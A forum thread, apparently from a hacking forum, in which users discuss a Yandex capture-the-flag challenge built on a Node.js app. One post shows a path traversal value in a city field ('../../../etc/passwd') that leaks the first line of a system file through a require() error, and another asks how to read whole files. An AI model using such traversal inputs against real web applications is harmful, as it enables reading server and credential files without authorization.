• XSS.stack #1 – первый литературный журнал от юзеров форума

проходил кто нибудь уже CTF яндекса?

Отслеживать
hmm so that login form should be inject-able? Can't find anything useful, only thing I see is when you manually change the city value that you get
an error like:

Код: 
[HEADING=2]Welcome[/HEADING]
[HEADING=2]Cannot find module '../lib/offices/-' Require stack: - /app/routes/register.js - /app/app.js - /app/bin/www[/HEADING]
 
может ли тут быть, что то полезное? ведь не даром эти ошики там показываются )
Код: 
NotFoundError: Not Found
    at /app/app.js:29:10
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at trim_prefix (/app/node_modules/express/lib/router/index.js:317:13)
    at /app/node_modules/express/lib/router/index.js:284:7
    at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)
    at next (/app/node_modules/express/lib/router/index.js:275:10)
    at /app/node_modules/express/lib/router/index.js:635:15
    at next (/app/node_modules/express/lib/router/index.js:260:14)
    at Function.handle (/app/node_modules/express/lib/router/index.js:174:3)
    at router (/app/node_modules/express/lib/router/index.js:47:12)
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at trim_prefix (/app/node_modules/express/lib/router/index.js:317:13)
    at /app/node_modules/express/lib/router/index.js:284:7
    at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)
    at next (/app/node_modules/express/lib/router/index.js:275:10)
    at SendStream.error (/app/node_modules/serve-static/index.js:121:7)
 
Yea the city value seems to look at a local file. So if you put: "../../../etc/passwd" then you get this error:

Код: 
Unexpected token ':'

/etc/passwd:1
root:x:0:0:root:/root:/bin/bash
        ^
SyntaxError: Unexpected token ':'
    at wrapSafe (internal/modules/cjs/loader.js:1001:16)
    at Module._compile (internal/modules/cjs/loader.js:1049:27)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
    at Module.load (internal/modules/cjs/loader.js:950:32)
    at Function.Module._load (internal/modules/cjs/loader.js:790:12)
    at Module.require (internal/modules/cjs/loader.js:974:19)
    at require (internal/modules/cjs/helpers.js:93:18)
    at /app/routes/register.js:40:19
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/app/node_modules/express/lib/router/route.js:137:13)

That's a different error then when you remove a single "../", then you get a not found error. So perhaps the flag is hidden in the file system? Don't know enough of LFI to help you but sounds interesting ^^
 
SpotnikSignal сказал(а):
Yea the city value seems to look at a local file. So if you put: "../../../etc/passwd" then you get this error:

Код: 
Unexpected token ':'

/etc/passwd:1
root:x:0:0:root:/root:/bin/bash
        ^
SyntaxError: Unexpected token ':'
    at wrapSafe (internal/modules/cjs/loader.js:1001:16)
    at Module._compile (internal/modules/cjs/loader.js:1049:27)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
    at Module.load (internal/modules/cjs/loader.js:950:32)
    at Function.Module._load (internal/modules/cjs/loader.js:790:12)
    at Module.require (internal/modules/cjs/loader.js:974:19)
    at require (internal/modules/cjs/helpers.js:93:18)
    at /app/routes/register.js:40:19
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/app/node_modules/express/lib/router/route.js:137:13)

That's a different error then when you remove a single "../", then you get a not found error. So perhaps the flag is hidden in the file system? Don't know enough of LFI to help you but sounds interesting ^^
I found this vulnerability, even found a flag, but this method allows you to read only the first line of the file. How to get the complete file?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх